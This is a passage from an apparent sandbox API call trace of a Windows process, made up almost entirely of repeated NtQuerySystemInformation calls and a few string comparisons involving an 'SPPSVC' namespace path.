SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0271.826] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0271.835] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x50, ResultLength=0x0) [0271.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x28, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x38, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x40, ResultLength=0x0) [0271.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x40, ResultLength=0x0) [0271.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x40, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x40, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb28, Length=0x30, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0271.853] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x28, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0271.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0271.862] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0271.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0271.865] 